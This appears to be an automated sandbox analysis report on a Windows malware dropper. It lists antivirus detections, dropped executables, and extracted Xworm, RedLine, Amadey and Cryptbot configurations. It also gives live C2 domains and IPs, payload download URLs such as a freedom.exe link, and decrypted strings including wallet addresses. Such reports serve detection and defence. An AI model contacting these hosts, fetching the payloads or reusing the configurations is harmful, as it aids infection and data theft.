thizx13vt.top	true	5%, Virustotal, Browse Avira URL Cloud: malware	unknown
95.179.163.21:29257	true	8%, Virustotal, Browse Avira URL Cloud: safe	unknown
analforeverlovyu.top	true	URL Reputation: safe	unknown
+#thizx13vt.top	true	Avira URL Cloud: safe	unknown
t.top	true	Avira URL Cloud: safe	unknown
exonic-hacks.com	true	Avira URL Cloud: safe	unknown

AV Detection

Antivirus detection for URL or domain

Source: http://thizx13vt.top/v	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/v1/upload.phpIq	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/g	Avira URL Cloud: Label: malware
Source: thizx13vt.top	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/j	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/x	Avira URL Cloud: Label: malware
Source: http://185.216.214.225/freedom.exe	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/v1/upload.phpM?	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top:80/v1/upload.phpraz	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/v1/upload.php%qN	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/v1/upload.phpsrJG	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/:F	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/2	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/)	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/E	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/F	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/S	Avira URL Cloud: Label: malware
Source: http://thizx13vt.top/N	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Avira: detection malicious, Label: HEUR/AGEN.1319014
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Avira: detection malicious, Label: TR/Crypt.XDR.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\contorax[1].exe	Avira: detection malicious, Label: TR/Crypt.XDR.Gen
Source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	Avira: detection malicious, Label: HEUR/AGEN.1313066
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Avira: detection malicious, Label: HEUR/AGEN.1313066
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\kitty[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1319014
Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe	Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Avira: detection malicious, Label: TR/Crypt.XDR.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 0000002A.00000002.4703878971.0000000012DF1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Xworm {"C2 url": ["exonic-hacks.com"], "Port": "1920", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source: 0000002B.00000002.3591044518.0000000003405000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: RedLine {"C2 url": "95.179.163.21:29257", "Bot Id": "LiveTraffic", "Message": "Disable Antivirus and try again", "Authorization Header": "143feb5082f9936e624c1e27545e7d19"}
Source: 31.3.build2.exe.2b60000.0.unpack	Malware Configuration Extractor: Amadey {"C2 url": "193.176.158.185/B0kf3CbAbR/index.php", "Version": "4.41", "Install Folder": "fed0c9a4d3", "Install File": "Hkbsse.exe"}
Source: 3546345.exe.7096.37.memstrmin	Malware Configuration Extractor: Cryptbot {"C2 list": ["POST13vt.top", "analforeverlovyu.top", "+#thizx13vt.top", "13vt.top", "thizx13vt.top", "t.top", "+thizx13vt.top"]}

Multi AV Scanner detection for domain / URL

Source: thizx13vt.top	Virustotal: Detection: 5%	Perma Link
Source: 95.179.163.21:29257	Virustotal: Detection: 8%	Perma Link
Source: http://185.216.214.225/freedom.exe	Virustotal: Detection: 20%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	ReversingLabs: Detection: 91%
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	ReversingLabs: Detection: 84%
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	ReversingLabs: Detection: 87%
Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe	ReversingLabs: Detection: 84%
Source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\BowExpert[1].exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\contorax[1].exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\crypteda[1].exe	ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\GOLD[1].exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build2[1].exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\channel2[1].exe	ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\3546345[1].exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Channel1[1].exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\exbuild[1].exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\kitty[1].exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\meta[1].exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	ReversingLabs: Detection: 100%
Source: C:\Users\user\AppData\Local\Temp\1000221001\exbuild.exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Temp\1000255001\channel2.exe	ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\1000256001\BowExpert.exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1000260001\Channel1.exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\fed0c9a4d3\Hkbsse.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Roaming\WIDeqOfZq9.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\Windows.exe	ReversingLabs: Detection: 84%

Multi AV Scanner detection for submitted file

Source: wfJfUGeGT3.exe	ReversingLabs: Detection: 13%
Source: wfJfUGeGT3.exe	Virustotal: Detection: 13%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000221001\exbuild.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build2[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\GOLD[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\crypteda[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\contorax[1].exe	Joe Sandbox ML: detected
Source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\kitty[1].exe	Joe Sandbox ML: detected
Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\exbuild[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: wfJfUGeGT3.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack	String decryptor: exonic-hacks.com
Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack	String decryptor: 1920
Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack	String decryptor: <123456789>
Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack	String decryptor: <Xwormmm>
Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack	String decryptor: NewAged
Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack	String decryptor: USB.exe
Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack	String decryptor: %Userprofile%
Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack	String decryptor: Windows.exe
Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack	String decryptor: bc1qvjral4f3vdvgp4ep5al5a08zxl3ympwr208tef
Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack	String decryptor: 0x8bF11EF53522Af8409ed77b05B1C5A0059F14571
Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack	String decryptor: TRC20_Address

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe

Unpacked PE file: 31.2.build2.exe.400000.0.unpack

Uses 32bit PE files

Source: wfJfUGeGT3.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\installutil.exe.log

Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: wfJfUGeGT3.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: RegAsm.exe, 0000002E.00000002.4809129127.00000000056AF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: RegAsm.exe, 0000002E.00000002.4809129127.0000000005694000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.ServiceModel.pdb source: RegAsm.exe, 0000002E.00000002.4599535887.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb source: RegAsm.exe, 0000002E.00000002.4728747003.00000000012FA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: RegAsm.exe, 0000002E.00000002.4728747003.0000000001281000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: G.pdb source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Code function: 0_2_004062EB FindFirstFileW,FindClose,	0_2_004062EB
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Code function: 0_2_00406CB1 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406CB1
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_00614005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	19_2_00614005
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	19_2_0061C2FF
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061494A GetFileAttributesW,FindFirstFileW,FindClose,	19_2_0061494A
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061CD14 FindFirstFileW,FindClose,	19_2_0061CD14
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	19_2_0061CD9F
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	19_2_0061F5D8
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	19_2_0061F735
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0061FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	19_2_0061FA36
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_00613CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	19_2_00613CE2
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CC38B4 FindFirstFileExW,	24_2_00CC38B4
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_007638B4 FindFirstFileExW,	27_2_007638B4
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_004415EE FindFirstFileExW,	31_2_004415EE
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B31855 FindFirstFileExW,	31_2_02B31855

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\591950\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\591950	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: exonic-hacks.com
Source: Malware configuration extractor	IPs: 193.176.158.185
Source: Malware configuration extractor	URLs: POST13vt.top
Source: Malware configuration extractor	URLs: analforeverlovyu.top
Source: Malware configuration extractor	URLs: +#thizx13vt.top
Source: Malware configuration extractor	URLs: 13vt.top
Source: Malware configuration extractor	URLs: thizx13vt.top
Source: Malware configuration extractor	URLs: t.top
Source: Malware configuration extractor	URLs: +thizx13vt.top
Source: Malware configuration extractor	URLs: 95.179.163.21:29257

Yara detected Generic Downloader

Source: Yara match	File source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.0.IIZS2TRqf69aZbLAX3cf3edn.exe.bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\Windows.exe, type: DROPPED

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 162.125.66.18 162.125.66.18
Source: Joe Sandbox View	IP Address: 185.215.113.19 185.215.113.19

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_006229BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

19_2_006229BA

Source: InstallUtil.exe, 00000032.00000002.3758938143.000000000337B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $jq3IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\jq equals www.youtube.com (Youtube)
Source: InstallUtil.exe, 00000032.00000002.3758938143.000000000337B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
Source: InstallUtil.exe, 00000032.00000002.3758938143.000000000337B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\jq equals www.youtube.com (Youtube)
Source: InstallUtil.exe, 00000032.00000002.3758938143.000000000337B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: `,jq#www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)

Source: Cerker.exe, 0000001C.00000003.3509353341.0000000001219000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.216.214.225/
Source: Cerker.exe, 00000022.00000002.4622434555.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.216.214.225/Jhiidutz.exe
Source: Cerker.exe, 00000022.00000003.3805623513.0000000000D15000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.4037312002.0000000000D15000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.4094207882.0000000000D15000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3820865789.0000000000D15000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3842369275.0000000000D15000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3733155923.0000000000D15000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000D15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.216.214.225/Jhiidutz.exee
Source: Cerker.exe, 0000001C.00000003.4059843797.0000000001215000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000002.4613814551.0000000001215000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.4190412440.0000000001215000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.3509353341.0000000001219000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.216.214.225/freedom.exe
Source: Cerker.exe, 00000022.00000002.4622434555.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.216.214.225/freedom.exe-
Source: Cerker.exe, 0000001C.00000003.3509353341.0000000001219000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.216.214.225/freedom.exej
Source: Cerker.exe, 0000001C.00000003.3509353341.0000000001219000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.216.214.225/freedom.exeryWt.exe
Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: Cerker.exe, 0000001C.00000003.3385926643.000000000121B000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.3382418323.000000000121B000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.3386987728.000000000121B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000002.4674057559.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000002.4674057559.0000000002EA3000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000002.4674057559.0000000002E38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000002.4703878971.0000000012DF1000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000000.3476472138.0000000000BF2000.00000002.00000001.01000000.00000014.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000002.4674057559.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe.28.dr	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: wfJfUGeGT3.exe, BowExpert.exe.11.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr	String found in binary or memory: http://ocsp.entrust.net02
Source: GOLD.exe.11.dr, GOLD[1].exe.11.dr, crypteda[1].exe.11.dr	String found in binary or memory: http://ocsp.entrust.net03
Source: Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Shipment.pif, 0000000B.00000003.2056731275.00000000046B2000.00000004.00000800.00020000.00000000.sdmp, Shipment.pif.1.dr, GuardTrack.scr.11.dr, Scottish.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: winmsbt.exe, 00000021.00000002.4712142699.0000000003234000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.00000000032F2000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.0000000003411000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.000000000325F000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.000000000331B000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.000000000320A000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.00000000032B3000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.000000000336A000.00000004.00000800.00020000.00000000.sdmp, winmsbt.exe, 00000021.00000002.4712142699.0000000003289000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pastebin.com
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: RegAsm.exe, 0000002E.00000002.4755857564.0000000002E40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
